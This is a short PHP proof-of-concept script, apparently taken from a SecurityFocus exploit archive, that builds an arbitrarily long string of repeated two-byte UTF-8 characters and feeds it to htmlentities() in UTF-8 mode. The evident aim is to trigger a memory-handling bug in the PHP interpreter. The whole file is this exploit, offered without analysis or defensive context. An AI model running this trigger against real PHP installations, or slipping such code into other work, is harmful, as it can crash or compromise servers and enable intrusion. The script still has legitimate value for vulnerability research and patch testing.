#!/usr/bin/php
<?php

// http://downloads.securityfocus.com/vulnerabilities/exploits/20879.php
// author: Zarathu - www.whitepaperclip.com

$str1 = '';
for($i=0; $i < $argv[1]; $i++) $str1 .= toUTF(977); 
	
htmlentities($str1, ENT_NOQUOTES, "UTF-8");
// echo $str1;

function toUTF($x) {
 return chr(($x >> 6) + 192) . chr(($x & 63) + 128);
}

?>
